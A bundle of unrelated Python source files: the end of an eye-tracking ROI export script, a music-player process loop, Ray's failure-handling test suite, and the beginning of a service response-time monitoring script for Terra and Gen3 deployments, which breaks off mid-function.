else:
df = pd.concat(df)
#!!!----combine all rois across images
if cls.detection=='manual':
# export to xlsx or ias
_folder = '%s/data/'%(cls.output_path)
_filename = "bounds"
df = cls.export_data(df=df, path=_folder, filename=_filename, uuid=cls.uuid, level='all')
elif cls.detection=='haarcascade':
# export to xlsx
_folder = '%s/data/'%(cls.output_path)
_filepath = "%s/cascades.xlsx"%(_folder)
df.to_excel(_filepath, index=False)
#!!!----error log
if bool(errors):
_filename = Path('%s/error.csv'%(cls.output_path))
cls.console("Errors found. See log %s"%(_filename), 'red')
error = pd.DataFrame(errors, columns=['image','roi','message'])
error.to_csv(_filename, index=False)
else:
error = None
# finished
cls.console('finished()','purple')
return df, error
# if calling from cmd/terminal
if __name__ == '__main__':
import sys, argparse, re
# https://docs.python.org/3.7/library/argparse.html
# args
sys.argv[0] = re.sub(r'(-script\.pyw?|\.exe)?$', '', sys.argv[0])
parser = argparse.ArgumentParser(
prog = sys.argv[0],
usage = "Create regions of interest to export into Eyelink DataViewer or statistical resources such as R and python."
)
# main arguments
parser.add_argument("--image_path", help="image_path.", default=None)
parser.add_argument("--output_path", help="output_path.", default=None)
parser.add_argument("--metadata_source", help="metadata_source.", default=None)
# start
args_ = parser.parse_args()
sys.exit(ROI(args_))
|
BROKEN with Music.py
|
''' Doc_String '''
####################################################################
####################################################################
def main_loop( App ):
"Create QUEUE and start progress_bar process"
queue = Queue()
"Start a process that listens for the next Audio track"
music_player = Process(target=poll_queue, args=( queue, ))
music_player.start()
"Start the main App"
run(App, queue)
## Close Processes ##
"Check if music player is still running"
if music_player.is_alive():
queue.put('break')
music_player.join(timeout=0.1)
"Check if JOIN failed"
if music_player.is_alive():
print('music_player still alive...')
print('Killing music_player','\n')
music_player.terminate()
####################################################################
####################################################################
if __name__ == '__main__':
from MAIN import *
main_loop( App )
####################################################################
####################################################################
|
test_failure.py
|
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import json
import os
import pyarrow.plasma as plasma
import pytest
import sys
import tempfile
import threading
import time
import numpy as np
import redis
import ray
import ray.ray_constants as ray_constants
from ray.tests.cluster_utils import Cluster
from ray.tests.utils import (
relevant_errors,
wait_for_errors,
)
def test_failed_task(ray_start_regular):
@ray.remote
def throw_exception_fct1():
raise Exception("Test function 1 intentionally failed.")
@ray.remote
def throw_exception_fct2():
raise Exception("Test function 2 intentionally failed.")
@ray.remote(num_return_vals=3)
def throw_exception_fct3(x):
raise Exception("Test function 3 intentionally failed.")
throw_exception_fct1.remote()
throw_exception_fct1.remote()
wait_for_errors(ray_constants.TASK_PUSH_ERROR, 2)
assert len(relevant_errors(ray_constants.TASK_PUSH_ERROR)) == 2
for task in relevant_errors(ray_constants.TASK_PUSH_ERROR):
msg = task.get("message")
assert "Test function 1 intentionally failed." in msg
x = throw_exception_fct2.remote()
try:
ray.get(x)
except Exception as e:
assert "Test function 2 intentionally failed." in str(e)
else:
# ray.get should throw an exception.
assert False
x, y, z = throw_exception_fct3.remote(1.0)
for ref in [x, y, z]:
try:
ray.get(ref)
except Exception as e:
assert "Test function 3 intentionally failed." in str(e)
else:
# ray.get should throw an exception.
assert False
@ray.remote
def f():
raise Exception("This function failed.")
try:
ray.get(f.remote())
except Exception as e:
assert "This function failed." in str(e)
else:
# ray.get should throw an exception.
assert False
def test_fail_importing_remote_function(ray_start_2_cpus):
# Create the contents of a temporary Python file.
temporary_python_file = """
def temporary_helper_function():
return 1
"""
f = tempfile.NamedTemporaryFile(suffix=".py")
f.write(temporary_python_file.encode("ascii"))
f.flush()
directory = os.path.dirname(f.name)
# Get the module name and strip ".py" from the end.
module_name = os.path.basename(f.name)[:-3]
sys.path.append(directory)
module = __import__(module_name)
# Define a function that closes over this temporary module. This should
# fail when it is unpickled.
@ray.remote
def g():
try:
module.temporary_python_file()
except Exception:
# This test is not concerned with the error from running this
# function. Only from unpickling the remote function.
pass
# Invoke the function so that the definition is exported.
g.remote()
wait_for_errors(ray_constants.REGISTER_REMOTE_FUNCTION_PUSH_ERROR, 2)
errors = relevant_errors(ray_constants.REGISTER_REMOTE_FUNCTION_PUSH_ERROR)
assert len(errors) == 2
assert "No module named" in errors[0]["message"]
assert "No module named" in errors[1]["message"]
# Check that if we try to call the function it throws an exception and
# does not hang.
for _ in range(10):
with pytest.raises(Exception):
ray.get(g.remote())
f.close()
# Clean up the junk we added to sys.path.
sys.path.pop(-1)
def test_failed_function_to_run(ray_start_2_cpus):
def f(worker):
if ray.worker.global_worker.mode == ray.WORKER_MODE:
raise Exception("Function to run failed.")
ray.worker.global_worker.run_function_on_all_workers(f)
wait_for_errors(ray_constants.FUNCTION_TO_RUN_PUSH_ERROR, 2)
# Check that the error message is in the task info.
errors = relevant_errors(ray_constants.FUNCTION_TO_RUN_PUSH_ERROR)
assert len(errors) == 2
assert "Function to run failed." in errors[0]["message"]
assert "Function to run failed." in errors[1]["message"]
def test_fail_importing_actor(ray_start_regular):
# Create the contents of a temporary Python file.
temporary_python_file = """
def temporary_helper_function():
return 1
"""
f = tempfile.NamedTemporaryFile(suffix=".py")
f.write(temporary_python_file.encode("ascii"))
f.flush()
directory = os.path.dirname(f.name)
# Get the module name and strip ".py" from the end.
module_name = os.path.basename(f.name)[:-3]
sys.path.append(directory)
module = __import__(module_name)
# Define an actor that closes over this temporary module. This should
# fail when it is unpickled.
@ray.remote
class Foo(object):
def __init__(self):
self.x = module.temporary_python_file()
def get_val(self):
return 1
# There should be no errors yet.
assert len(ray.errors()) == 0
# Create an actor.
foo = Foo.remote()
# Wait for the error to arrive.
wait_for_errors(ray_constants.REGISTER_ACTOR_PUSH_ERROR, 1)
errors = relevant_errors(ray_constants.REGISTER_ACTOR_PUSH_ERROR)
assert "No module named" in errors[0]["message"]
# Wait for the error from when the __init__ tries to run.
wait_for_errors(ray_constants.TASK_PUSH_ERROR, 1)
errors = relevant_errors(ray_constants.TASK_PUSH_ERROR)
assert ("failed to be imported, and so cannot execute this method" in
errors[0]["message"])
# Check that if we try to get the function it throws an exception and
# does not hang.
with pytest.raises(Exception):
ray.get(foo.get_val.remote())
# Wait for the error from when the call to get_val.
wait_for_errors(ray_constants.TASK_PUSH_ERROR, 2)
errors = relevant_errors(ray_constants.TASK_PUSH_ERROR)
assert ("failed to be imported, and so cannot execute this method" in
errors[1]["message"])
f.close()
# Clean up the junk we added to sys.path.
sys.path.pop(-1)
def test_failed_actor_init(ray_start_regular):
error_message1 = "actor constructor failed"
error_message2 = "actor method failed"
@ray.remote
class FailedActor(object):
def __init__(self):
raise Exception(error_message1)
def fail_method(self):
raise Exception(error_message2)
a = FailedActor.remote()
# Make sure that we get errors from a failed constructor.
wait_for_errors(ray_constants.TASK_PUSH_ERROR, 1)
errors = relevant_errors(ray_constants.TASK_PUSH_ERROR)
assert len(errors) == 1
assert error_message1 in errors[0]["message"]
# Make sure that we get errors from a failed method.
a.fail_method.remote()
wait_for_errors(ray_constants.TASK_PUSH_ERROR, 2)
errors = relevant_errors(ray_constants.TASK_PUSH_ERROR)
assert len(errors) == 2
assert error_message1 in errors[1]["message"]
def test_failed_actor_method(ray_start_regular):
error_message2 = "actor method failed"
@ray.remote
class FailedActor(object):
def __init__(self):
pass
def fail_method(self):
raise Exception(error_message2)
a = FailedActor.remote()
# Make sure that we get errors from a failed method.
a.fail_method.remote()
wait_for_errors(ray_constants.TASK_PUSH_ERROR, 1)
errors = relevant_errors(ray_constants.TASK_PUSH_ERROR)
assert len(errors) == 1
assert error_message2 in errors[0]["message"]
def test_incorrect_method_calls(ray_start_regular):
@ray.remote
class Actor(object):
def __init__(self, missing_variable_name):
pass
def get_val(self, x):
pass
# Make sure that we get errors if we call the constructor incorrectly.
# Create an actor with too few arguments.
with pytest.raises(Exception):
a = Actor.remote()
# Create an actor with too many arguments.
with pytest.raises(Exception):
a = Actor.remote(1, 2)
# Create an actor the correct number of arguments.
a = Actor.remote(1)
# Call a method with too few arguments.
with pytest.raises(Exception):
a.get_val.remote()
# Call a method with too many arguments.
with pytest.raises(Exception):
a.get_val.remote(1, 2)
# Call a method that doesn't exist.
with pytest.raises(AttributeError):
a.nonexistent_method()
with pytest.raises(AttributeError):
a.nonexistent_method.remote()
def test_worker_raising_exception(ray_start_regular):
@ray.remote
def f():
ray.worker.global_worker._get_next_task_from_raylet = None
# Running this task should cause the worker to raise an exception after
# the task has successfully completed.
f.remote()
wait_for_errors(ray_constants.WORKER_CRASH_PUSH_ERROR, 1)
wait_for_errors(ray_constants.WORKER_DIED_PUSH_ERROR, 1)
def test_worker_dying(ray_start_regular):
# Define a remote function that will kill the worker that runs it.
@ray.remote
def f():
eval("exit()")
with pytest.raises(ray.exceptions.RayWorkerError):
ray.get(f.remote())
wait_for_errors(ray_constants.WORKER_DIED_PUSH_ERROR, 1)
errors = relevant_errors(ray_constants.WORKER_DIED_PUSH_ERROR)
assert len(errors) == 1
assert "died or was killed while executing" in errors[0]["message"]
def test_actor_worker_dying(ray_start_regular):
@ray.remote
class Actor(object):
def kill(self):
eval("exit()")
@ray.remote
def consume(x):
pass
a = Actor.remote()
[obj], _ = ray.wait([a.kill.remote()], timeout=5.0)
with pytest.raises(ray.exceptions.RayActorError):
ray.get(obj)
with pytest.raises(ray.exceptions.RayTaskError):
ray.get(consume.remote(obj))
wait_for_errors(ray_constants.WORKER_DIED_PUSH_ERROR, 1)
def test_actor_worker_dying_future_tasks(ray_start_regular):
@ray.remote
class Actor(object):
def getpid(self):
return os.getpid()
def sleep(self):
time.sleep(1)
a = Actor.remote()
pid = ray.get(a.getpid.remote())
tasks1 = [a.sleep.remote() for _ in range(10)]
os.kill(pid, 9)
time.sleep(0.1)
tasks2 = [a.sleep.remote() for _ in range(10)]
for obj in tasks1 + tasks2:
with pytest.raises(Exception):
ray.get(obj)
wait_for_errors(ray_constants.WORKER_DIED_PUSH_ERROR, 1)
def test_actor_worker_dying_nothing_in_progress(ray_start_regular):
@ray.remote
class Actor(object):
def getpid(self):
return os.getpid()
a = Actor.remote()
pid = ray.get(a.getpid.remote())
os.kill(pid, 9)
time.sleep(0.1)
task2 = a.getpid.remote()
with pytest.raises(Exception):
ray.get(task2)
def test_actor_scope_or_intentionally_killed_message(ray_start_regular):
@ray.remote
class Actor(object):
pass
a = Actor.remote()
a = Actor.remote()
a.__ray_terminate__.remote()
time.sleep(1)
assert len(
ray.errors()) == 0, ("Should not have propogated an error - {}".format(
ray.errors()))
@pytest.mark.skip("This test does not work yet.")
@pytest.mark.parametrize(
"ray_start_object_store_memory", [10**6], indirect=True)
def test_put_error1(ray_start_object_store_memory):
num_objects = 3
object_size = 4 * 10**5
# Define a task with a single dependency, a numpy array, that returns
# another array.
@ray.remote
def single_dependency(i, arg):
arg = np.copy(arg)
arg[0] = i
return arg
@ray.remote
def put_arg_task():
# Launch num_objects instances of the remote task, each dependent
# on the one before it. The result of the first task should get
# evicted.
args = []
arg = single_dependency.remote(0, np.zeros(
object_size, dtype=np.uint8))
for i in range(num_objects):
arg = single_dependency.remote(i, arg)
args.append(arg)
# Get the last value to force all tasks to finish.
value = ray.get(args[-1])
assert value[0] == i
# Get the first value (which should have been evicted) to force
# reconstruction. Currently, since we're not able to reconstruct
# `ray.put` objects that were evicted and whose originating tasks
# are still running, this for-loop should hang and push an error to
# the driver.
ray.get(args[0])
put_arg_task.remote()
# Make sure we receive the correct error message.
wait_for_errors(ray_constants.PUT_RECONSTRUCTION_PUSH_ERROR, 1)
@pytest.mark.skip("This test does not work yet.")
@pytest.mark.parametrize(
"ray_start_object_store_memory", [10**6], indirect=True)
def test_put_error2(ray_start_object_store_memory):
# This is the same as the previous test, but it calls ray.put directly.
num_objects = 3
object_size = 4 * 10**5
# Define a task with a single dependency, a numpy array, that returns
# another array.
@ray.remote
def single_dependency(i, arg):
arg = np.copy(arg)
arg[0] = i
return arg
@ray.remote
def put_task():
# Launch num_objects instances of the remote task, each dependent
# on the one before it. The result of the first task should get
# evicted.
args = []
arg = ray.put(np.zeros(object_size, dtype=np.uint8))
for i in range(num_objects):
arg = single_dependency.remote(i, arg)
args.append(arg)
# Get the last value to force all tasks to finish.
value = ray.get(args[-1])
assert value[0] == i
# Get the first value (which should have been evicted) to force
# reconstruction. Currently, since we're not able to reconstruct
# `ray.put` objects that were evicted and whose originating tasks
# are still running, this for-loop should hang and push an error to
# the driver.
ray.get(args[0])
put_task.remote()
# Make sure we receive the correct error message.
wait_for_errors(ray_constants.PUT_RECONSTRUCTION_PUSH_ERROR, 1)
def test_version_mismatch(shutdown_only):
ray_version = ray.__version__
ray.__version__ = "fake ray version"
ray.init(num_cpus=1)
wait_for_errors(ray_constants.VERSION_MISMATCH_PUSH_ERROR, 1)
# Reset the version.
ray.__version__ = ray_version
def test_warning_monitor_died(shutdown_only):
ray.init(num_cpus=0)
time.sleep(1) # Make sure the monitor has started.
# Cause the monitor to raise an exception by pushing a malformed message to
# Redis. This will probably kill the raylets and the raylet_monitor in
# addition to the monitor.
fake_id = 20 * b"\x00"
malformed_message = "asdf"
redis_client = ray.worker.global_worker.redis_client
redis_client.execute_command(
"RAY.TABLE_ADD", ray.gcs_utils.TablePrefix.Value("HEARTBEAT_BATCH"),
ray.gcs_utils.TablePubsub.Value("HEARTBEAT_BATCH_PUBSUB"), fake_id,
malformed_message)
wait_for_errors(ray_constants.MONITOR_DIED_ERROR, 1)
def test_export_large_objects(ray_start_regular):
import ray.ray_constants as ray_constants
large_object = np.zeros(2 * ray_constants.PICKLE_OBJECT_WARNING_SIZE)
@ray.remote
def f():
large_object
# Invoke the function so that the definition is exported.
f.remote()
# Make sure that a warning is generated.
wait_for_errors(ray_constants.PICKLING_LARGE_OBJECT_PUSH_ERROR, 1)
@ray.remote
class Foo(object):
def __init__(self):
large_object
Foo.remote()
# Make sure that a warning is generated.
wait_for_errors(ray_constants.PICKLING_LARGE_OBJECT_PUSH_ERROR, 2)
def test_warning_for_infeasible_tasks(ray_start_regular):
# Check that we get warning messages for infeasible tasks.
@ray.remote(num_gpus=1)
def f():
pass
@ray.remote(resources={"Custom": 1})
class Foo(object):
pass
# This task is infeasible.
f.remote()
wait_for_errors(ray_constants.INFEASIBLE_TASK_ERROR, 1)
# This actor placement task is infeasible.
Foo.remote()
wait_for_errors(ray_constants.INFEASIBLE_TASK_ERROR, 2)
def test_warning_for_infeasible_zero_cpu_actor(shutdown_only):
# Check that we cannot place an actor on a 0 CPU machine and that we get an
# infeasibility warning (even though the actor creation task itself
# requires no CPUs).
ray.init(num_cpus=0)
@ray.remote
class Foo(object):
pass
# The actor creation should be infeasible.
Foo.remote()
wait_for_errors(ray_constants.INFEASIBLE_TASK_ERROR, 1)
def test_warning_for_too_many_actors(shutdown_only):
# Check that if we run a workload which requires too many workers to be
# started that we will receive a warning.
num_cpus = 2
ray.init(num_cpus=num_cpus)
@ray.remote
class Foo(object):
def __init__(self):
time.sleep(1000)
[Foo.remote() for _ in range(num_cpus * 3)]
wait_for_errors(ray_constants.WORKER_POOL_LARGE_ERROR, 1)
[Foo.remote() for _ in range(num_cpus)]
wait_for_errors(ray_constants.WORKER_POOL_LARGE_ERROR, 2)
def test_warning_for_too_many_nested_tasks(shutdown_only):
# Check that if we run a workload which requires too many workers to be
# started that we will receive a warning.
num_cpus = 2
ray.init(num_cpus=num_cpus)
@ray.remote
def f():
time.sleep(1000)
return 1
@ray.remote
def g():
# Sleep so that the f tasks all get submitted to the scheduler after
# the g tasks.
time.sleep(1)
ray.get(f.remote())
[g.remote() for _ in range(num_cpus * 4)]
wait_for_errors(ray_constants.WORKER_POOL_LARGE_ERROR, 1)
def test_redis_module_failure(ray_start_regular):
address_info = ray_start_regular
redis_address = address_info["redis_address"]
redis_address = redis_address.split(":")
assert len(redis_address) == 2
def run_failure_test(expecting_message, *command):
with pytest.raises(
Exception, match=".*{}.*".format(expecting_message)):
client = redis.StrictRedis(
host=redis_address[0], port=int(redis_address[1]))
client.execute_command(*command)
def run_one_command(*command):
client = redis.StrictRedis(
host=redis_address[0], port=int(redis_address[1]))
client.execute_command(*command)
run_failure_test("wrong number of arguments", "RAY.TABLE_ADD", 13)
run_failure_test("Prefix must be in the TablePrefix range",
"RAY.TABLE_ADD", 100000, 1, 1, 1)
run_failure_test("Prefix must be in the TablePrefix range",
"RAY.TABLE_REQUEST_NOTIFICATIONS", 100000, 1, 1, 1)
run_failure_test("Prefix must be a valid TablePrefix integer",
"RAY.TABLE_ADD", b"a", 1, 1, 1)
run_failure_test("Pubsub channel must be in the TablePubsub range",
"RAY.TABLE_ADD", 1, 10000, 1, 1)
run_failure_test("Pubsub channel must be a valid integer", "RAY.TABLE_ADD",
1, b"a", 1, 1)
# Change the key from 1 to 2, since the previous command should have
# succeeded at writing the key, but not publishing it.
run_failure_test("Index is less than 0.", "RAY.TABLE_APPEND", 1, 1, 2, 1,
-1)
run_failure_test("Index is not a number.", "RAY.TABLE_APPEND", 1, 1, 2, 1,
b"a")
run_one_command("RAY.TABLE_APPEND", 1, 1, 2, 1)
# It's okay to add duplicate entries.
run_one_command("RAY.TABLE_APPEND", 1, 1, 2, 1)
run_one_command("RAY.TABLE_APPEND", 1, 1, 2, 1, 0)
run_one_command("RAY.TABLE_APPEND", 1, 1, 2, 1, 1)
run_one_command("RAY.SET_ADD", 1, 1, 3, 1)
# It's okey to add duplicate entries.
run_one_command("RAY.SET_ADD", 1, 1, 3, 1)
run_one_command("RAY.SET_REMOVE", 1, 1, 3, 1)
# It's okey to remove duplicate entries.
run_one_command("RAY.SET_REMOVE", 1, 1, 3, 1)
# Note that this test will take at least 10 seconds because it must wait for
# the monitor to detect enough missed heartbeats.
def test_warning_for_dead_node(ray_start_cluster_2_nodes):
cluster = ray_start_cluster_2_nodes
cluster.wait_for_nodes()
node_ids = {item["NodeID"] for item in ray.nodes()}
# Try to make sure that the monitor has received at least one heartbeat
# from the node.
time.sleep(0.5)
# Kill both raylets.
cluster.list_all_nodes()[1].kill_raylet()
cluster.list_all_nodes()[0].kill_raylet()
# Check that we get warning messages for both raylets.
wait_for_errors(ray_constants.REMOVED_NODE_ERROR, 2, timeout=40)
# Extract the client IDs from the error messages. This will need to be
# changed if the error message changes.
warning_node_ids = {
item["message"].split(" ")[5]
for item in relevant_errors(ray_constants.REMOVED_NODE_ERROR)
}
assert node_ids == warning_node_ids
def test_raylet_crash_when_get(ray_start_regular):
nonexistent_id = ray.ObjectID.from_random()
def sleep_to_kill_raylet():
# Don't kill raylet before default workers get connected.
time.sleep(2)
ray.worker._global_node.kill_raylet()
thread = threading.Thread(target=sleep_to_kill_raylet)
thread.start()
with pytest.raises(ray.exceptions.UnreconstructableError):
ray.get(nonexistent_id)
thread.join()
def test_connect_with_disconnected_node(shutdown_only):
config = json.dumps({
"num_heartbeats_timeout": 50,
"heartbeat_timeout_milliseconds": 10,
})
cluster = Cluster()
cluster.add_node(num_cpus=0, _internal_config=config)
ray.init(redis_address=cluster.redis_address)
info = relevant_errors(ray_constants.REMOVED_NODE_ERROR)
assert len(info) == 0
# This node is killed by SIGKILL, ray_monitor will mark it to dead.
dead_node = cluster.add_node(num_cpus=0, _internal_config=config)
cluster.remove_node(dead_node, allow_graceful=False)
wait_for_errors(ray_constants.REMOVED_NODE_ERROR, 1, timeout=2)
# This node is killed by SIGKILL, ray_monitor will mark it to dead.
dead_node = cluster.add_node(num_cpus=0, _internal_config=config)
cluster.remove_node(dead_node, allow_graceful=False)
wait_for_errors(ray_constants.REMOVED_NODE_ERROR, 2, timeout=2)
# This node is killed by SIGTERM, ray_monitor will not mark it again.
removing_node = cluster.add_node(num_cpus=0, _internal_config=config)
cluster.remove_node(removing_node, allow_graceful=True)
with pytest.raises(Exception, match=("Timing out of wait.")):
wait_for_errors(ray_constants.REMOVED_NODE_ERROR, 3, timeout=2)
# There is no connection error to a dead node.
info = relevant_errors(ray_constants.RAYLET_CONNECTION_ERROR)
assert len(info) == 0
@pytest.mark.parametrize(
"ray_start_cluster_head", [{
"num_cpus": 5,
"object_store_memory": 10**7
}],
indirect=True)
@pytest.mark.parametrize("num_actors", [1, 2, 5])
def test_parallel_actor_fill_plasma_retry(ray_start_cluster_head, num_actors):
@ray.remote
class LargeMemoryActor(object):
def some_expensive_task(self):
return np.zeros(10**7 // 2, dtype=np.uint8)
actors = [LargeMemoryActor.remote() for _ in range(num_actors)]
for _ in range(10):
pending = [a.some_expensive_task.remote() for a in actors]
while pending:
[done], pending = ray.wait(pending, num_returns=1)
@pytest.mark.parametrize(
"ray_start_cluster_head", [{
"num_cpus": 2,
"object_store_memory": 10**7
}],
indirect=True)
def test_fill_plasma_exception(ray_start_cluster_head):
@ray.remote
class LargeMemoryActor(object):
def some_expensive_task(self):
return np.zeros(10**7 + 2, dtype=np.uint8)
def test(self):
return 1
actor = LargeMemoryActor.remote()
with pytest.raises(ray.exceptions.RayTaskError):
ray.get(actor.some_expensive_task.remote())
# Make sure actor does not die
ray.get(actor.test.remote())
with pytest.raises(plasma.PlasmaStoreFull):
ray.put(np.zeros(10**7 + 2, dtype=np.uint8))
|
monitor_response_times.py
|
import argparse
import csv
import functools
import json
import logging
import os
import psutil
import threading
import time
from abc import ABC, abstractmethod
from dataclasses import dataclass
from datetime import datetime, timezone
from enum import Enum
from pathlib import Path
from threading import Thread
from typing import Tuple, Optional, Any
import requests
import schedule
class DeploymentInfo:
_project = None
_terra_deployment_tier = None
_terra_deployment_info = None
_gen3_deployment_info = None
class Project(Enum):
ANVIL = 1
BDC = 2
CRDC = 3
KF = 4
@classmethod
def set_project(cls, project_name: str) -> None:
project = project_name.strip().upper()
try:
project_value = cls.Project[project]
except KeyError as ex:
raise Exception(f"Unsupported project name: '{project_name}'", ex)
cls._project = project_value
class TerraDeploymentTier(Enum):
DEV = 1
ALPHA = 2
PERF = 3
STAGING = 4
PROD = 5
@classmethod
def set_terra_deployment_tier(cls, tier_name: str) -> None:
tier = tier_name.strip().upper()
try:
tier_value = cls.TerraDeploymentTier[tier]
except KeyError as ex:
raise Exception(f"Invalid Terra deployment tier name: '{tier_name}'", ex)
cls._terra_deployment_tier = tier_value
@dataclass
class TerraDeploymentInfo:
bond_host: str
bond_provider: str
martha_host: str
__terra_bdc_dev = TerraDeploymentInfo("broad-bond-dev.appspot.com",
"fence",
"us-central1-broad-dsde-dev.cloudfunctions.net")
__terra_bdc_alpha = TerraDeploymentInfo("broad-bond-alpha.appspot.com",
"fence",
"us-central1-broad-dsde-alpha.cloudfunctions.net")
__terra_bdc_prod = TerraDeploymentInfo("broad-bond-prod.appspot.com",
"fence",
"us-central1-broad-dsde-prod.cloudfunctions.net")
__terra_crdc_dev = TerraDeploymentInfo("broad-bond-dev.appspot.com",
"dcf-fence",
"us-central1-broad-dsde-dev.cloudfunctions.net")
__terra_crdc_alpha = TerraDeploymentInfo("broad-bond-alpha.appspot.com",
"dcf-fence",
"us-central1-broad-dsde-alpha.cloudfunctions.net")
__terra_crdc_prod = TerraDeploymentInfo("broad-bond-prod.appspot.com",
"dcf-fence",
"us-central1-broad-dsde-prod.cloudfunctions.net")
@dataclass
class Gen3DeploymentInfo:
gen3_host: str
public_drs_uri: str
cloud_uri_scheme: str = "gs"
__gen3_bdc_staging = Gen3DeploymentInfo("staging.gen3.biodatacatalyst.nhlbi.nih.gov",
"drs://dg.712C:dg.712C/fa640b0e-9779-452f-99a6-16d833d15bd0")
__gen3_bdc_prod = Gen3DeploymentInfo("gen3.biodatacatalyst.nhlbi.nih.gov",
"drs://dg.4503:dg.4503/15fdd543-9875-4edf-8bc2-22985473dab6")
__gen3_crdc_staging = Gen3DeploymentInfo("nci-crdc-staging.datacommons.io",
"drs://dg.4DFC:ddacaa74-97a9-4a0e-aa36-3e65fc8382d5")
__gen3_crdc_prod = Gen3DeploymentInfo("nci-crdc.datacommons.io",
"drs://dg.4DFC:011a6a54-1bfe-4df9-ae24-990b12a812d3")
class UnsupportedConfigurationException(Exception):
pass
@classmethod
def terra_factory(cls) -> TerraDeploymentInfo:
if cls._terra_deployment_info is None:
if cls._project == cls.Project.BDC:
if cls._terra_deployment_tier == cls.TerraDeploymentTier.DEV:
cls._terra_deployment_info = cls.__terra_bdc_dev
elif cls._terra_deployment_tier == cls.TerraDeploymentTier.ALPHA:
cls._terra_deployment_info = cls.__terra_bdc_alpha
elif cls._terra_deployment_tier == cls.TerraDeploymentTier.PROD:
cls._terra_deployment_info = cls.__terra_bdc_prod
elif cls._project == cls.Project.CRDC:
if cls._terra_deployment_tier == cls.TerraDeploymentTier.DEV:
cls._terra_deployment_info = cls.__terra_crdc_dev
elif cls._terra_deployment_tier == cls.TerraDeploymentTier.ALPHA:
cls._terra_deployment_info = cls.__terra_crdc_alpha
elif cls._terra_deployment_tier == cls.TerraDeploymentTier.PROD:
cls._terra_deployment_info = cls.__terra_crdc_prod
if cls._terra_deployment_info is None:
raise cls.UnsupportedConfigurationException(
f"Response time monitoring for the combination of project \'{cls._project.name}\' and Terra deployment tier \'{cls._terra_deployment_tier.name}\' is currently unsupported.")
return cls._terra_deployment_info
@classmethod
def gen3_factory(cls) -> Gen3DeploymentInfo:
if cls._gen3_deployment_info is None:
if cls._project == cls.Project.BDC:
if cls._terra_deployment_tier == cls.TerraDeploymentTier.PROD:
cls._gen3_deployment_info = cls.__gen3_bdc_prod
else:
cls._gen3_deployment_info = cls.__gen3_bdc_staging
elif cls._project == cls.Project.CRDC:
if cls._terra_deployment_tier == cls.TerraDeploymentTier.PROD:
cls._gen3_deployment_info = cls.__gen3_crdc_prod
else:
cls._gen3_deployment_info = cls.__gen3_crdc_staging
if cls._gen3_deployment_info is None:
raise cls.UnsupportedConfigurationException(
f"Response time monitoring for the combination of project '{cls._project.name}' and Terra deployment tier '{cls._terra_deployment_tier.name}' is currently unsupported.")
return cls._gen3_deployment_info
class MonitoringUtilityMethods:
def __init__(self):
super().__init__()
@staticmethod
def format_timestamp_as_utc(seconds_since_epoch: float):
return datetime.fromtimestamp(seconds_since_epoch, timezone.utc).strftime("%Y/%m/%d %H:%M:%S")
@staticmethod
def monitoring_info(start_time: float, response: requests.Response):
response_duration = round(time.time() - start_time, 3)
response_code = response.status_code
response_reason = response.reason
return dict(start_time=start_time, response_duration=response_duration,
response_code=response_code, response_reason=response_reason)
def flatten_monitoring_info_dict(self, monitoring_info_dict: dict) -> dict:
flattened = dict()
for operation_name, mon_info in monitoring_info_dict.items():
for metric, value in mon_info.items():
if metric in ['start_time', 'response_duration', 'response_code', 'response_reason']:
if metric == 'start_time' and type(value) == float:
value = self.format_timestamp_as_utc(value)
flattened[f"{operation_name}.{metric}"] = value
return flattened
@staticmethod
def get_output_filepath(output_filename: str):
global output_dir
return os.path.join(output_dir, output_filename)
def write_monitoring_info_to_csv(self, monitoring_info_dict: dict, output_filename: str) -> None:
output_filename = self.get_output_filepath(output_filename)
write_header = False if Path(output_filename).exists() else True
row_info = self.flatten_monitoring_info_dict(monitoring_info_dict)
with open(output_filename, 'a', newline='') as csvfile:
fieldnames = sorted(row_info.keys())
writer = csv.DictWriter(csvfile, fieldnames=fieldnames)
if write_header:
writer.writeheader()
writer.writerow(row_info)
class TerraMethods(MonitoringUtilityMethods):
def __init__(self):
super().__init__()
self._terra_info = DeploymentInfo.terra_factory()
self._gen3_info = DeploymentInfo.gen3_factory()
# When run in Terra, this returns the Terra user pet SA token
@staticmethod
def get_terra_user_pet_sa_token() -> str:
import google.auth.transport.requests
creds, projects = google.auth.default()
creds.refresh(google.auth.transport.requests.Request())
token = creds.token
return token
def get_external_identity_link_url_from_bond(self) -> Tuple[str, dict]:
headers = {
'content-type': "*/*"
}
start_time = time.time()
resp = requests.options(
f"https://{self._terra_info.bond_host}/api/link/v1/{self._terra_info.bond_provider}/authorization-url?scopes=openid&scopes=google_credentials&scopes=data&scopes=user&redirect_uri=https://app.terra.bio/#fence-callback&state=eyJwcm92aWRlciI6ImZlbmNlIn0=",
headers=headers)
logger.debug(f"Request URL: {resp.request.url}")
link_url = resp.url if resp.ok else None
return link_url, self.monitoring_info(start_time, resp)
def get_external_identity_status_from_bond(self, terra_user_token: str) -> Tuple[dict, dict]:
headers = {
'authorization': f"Bearer {terra_user_token}",
'content-type': "application/json"
}
start_time = time.time()
resp = requests.get(f"https://{self._terra_info.bond_host}/api/link/v1/{self._terra_info.bond_provider}",
headers=headers)
logger.debug(f"Request URL: {resp.request.url}")
resp_json = resp.json() if resp.ok else None
return resp_json, self.monitoring_info(start_time, resp)
def get_fence_token_from_bond(self, terra_user_token: str) -> Tuple[str, dict]:
headers = {
'authorization': f"Bearer {terra_user_token}",
'content-type': "application/json"
}
start_time = time.time()
resp = requests.get(
f"https://{self._terra_info.bond_host}/api/link/v1/{self._terra_info.bond_provider}/accesstoken",
headers=headers)
logger.debug(f"Request URL: {resp.request.url}")
token = resp.json().get('token') if resp.ok else None
return token, self.monitoring_info(start_time, resp)
def get_service_account_key_from_bond(self, terra_user_token: str) -> Tuple[dict, dict]:
headers = {
'authorization': f"Bearer {terra_user_token}",
'content-type': "application/json"
}
start_time = time.time()
resp = requests.get(
f"https://{self._terra_info.bond_host}/api/link/v1/{self._terra_info.bond_provider}/serviceaccount/key",
headers=headers)
logger.debug(f"Request URL: {resp.request.url}")
sa_key = resp.json().get('data') if resp.ok else None
return sa_key, self.monitoring_info(start_time, resp)
def get_martha_drs_response(self, terra_user_token: str, drs_uri: str = None) -> Tuple[dict, dict]:
if drs_uri is None:
drs_uri = self._gen3_info.public_drs_uri
headers = {
'authorization': f"Bearer {terra_user_token}",
'content-type': "application/json"
}
# Request the same fields as the Terra workflow DRS Localizer does.
data = json.dumps(dict(url=drs_uri, fields=['gsUri', 'googleServiceAccount', 'accessUrl', 'hashes']))
start_time = time.time()
resp = requests.post(f"https://{self._terra_info.martha_host}/martha_v3/",
